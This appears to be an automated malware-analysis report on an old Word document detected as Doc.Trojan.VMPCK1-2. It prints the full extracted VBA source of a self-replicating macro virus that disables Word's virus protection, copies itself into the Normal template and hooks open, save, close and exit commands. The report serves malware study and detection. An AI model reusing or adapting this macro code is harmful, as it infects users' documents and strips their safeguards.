Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9fe908e83331c01a…

MALICIOUS

Office (OLE)

41.5 KB Created: 1999-11-19 14:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 21297ac61c2a952afebfb9ec8da451f2 SHA-1: 10109684e2a2e2d0f83bb3ae3a0ac81ff1fe73ac SHA-256: 9fe908e83331c01af1e75869592c41ed61c4d2c3e59bb742c76685adfa06a6e3
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Word document containing VBA macros, including AutoOpen and Auto_Close, which are commonly used to execute malicious code upon opening or closing the document. The 'potato' macro appears to attempt to save the document, possibly as a mechanism for persistence or to drop additional payloads. The ClamAV detection further confirms its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.VMPCK1-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.VMPCK1-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2607 bytes
SHA-256: dc7b9367de596fceb0ef3ca4944ddcf836860ac0aabbb86c4f3e40a99c84db76
Detection
ClamAV: Doc.Trojan.VMPCK1-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "potato"

Public Skip As Integer
    
Sub potato()
    
On Error Resume Next
With Options
    .VirusProtection = (rnd * 0)
    .ConfirmConversions = (rnd * 0)
    .SaveNormalPrompt = (rnd * 0)
End With

ActiveDocument.ReadOnlyRecommended = False
bluerabbitobject = 0
Set targetrabbitobject = MacroContainer
'whiterabbitobject = GetAttr(NormalTemplate.FullName)
If targetrabbitobject = NormalTemplate Then bluerabbitobject = 1
If bluerabbitobject = 1 Then yellowrabbitobject = NormalTemplate.FullName Else yellowrabbitobject = ActiveDocument.FullName
If bluerabbitobject = 1 Then pinkrabbitobject = ActiveDocument.FullName Else pinkrabbitobject = NormalTemplate.FullName
Application.OrganizerCopy Source:=yellowrabbitobject, Destination:=pinkrabbitobject, Name:="potato", Object:=wdOrganizerObjectProjectItems
If bluerabbitobject = 1 And Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If bluerabbitobject = 0 Then
     If NormalTemplate.Saved = False Then NormalTemplate.Save
     End If
fuxors:
End Sub
Sub FileNew()
    On Error Resume Next
    Call potato
Dialogs(wdDialogFileNew).Show
    Skip = 1
    Call potato
End Sub
Sub FileSave()
    On Error Resume Next
    Call potato
    ActiveDocument.Save
End Sub
Sub FileClose()
    On Error Resume Next
    Call potato
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
End Sub
Sub ToolsOptions()
    On Error Resume Next
Dialogs(wdDialogToolsOptions).Show
    Call potato
End Sub
Sub FileSaveAs()
    On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
    Call potato
End Sub
Sub FileExit()
    On Error Resume Next
    Call potato
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub
Sub AutoOpen()
    On Error Resume Next
    Call potato
End Sub
Sub AutoExit()
    On Error Resume Next
    Call potato
End Sub
Sub AutoClose()
    On Error Resume Next
    Call potato
End Sub
Sub green(strFile As String)
    
'Dim hFile As Long
'On Error Resume Next
'hFile = FreeFile
'Open strFile For Output Access Write As hFile
'Print #hFile, "@echo off"
'Print #hFile, "@echo 1 Patato 2 patato 3 patato 4"
'Print #hFile, "@echo 5 Patato 6 patato 7 patato more"
'Close hFile
End Sub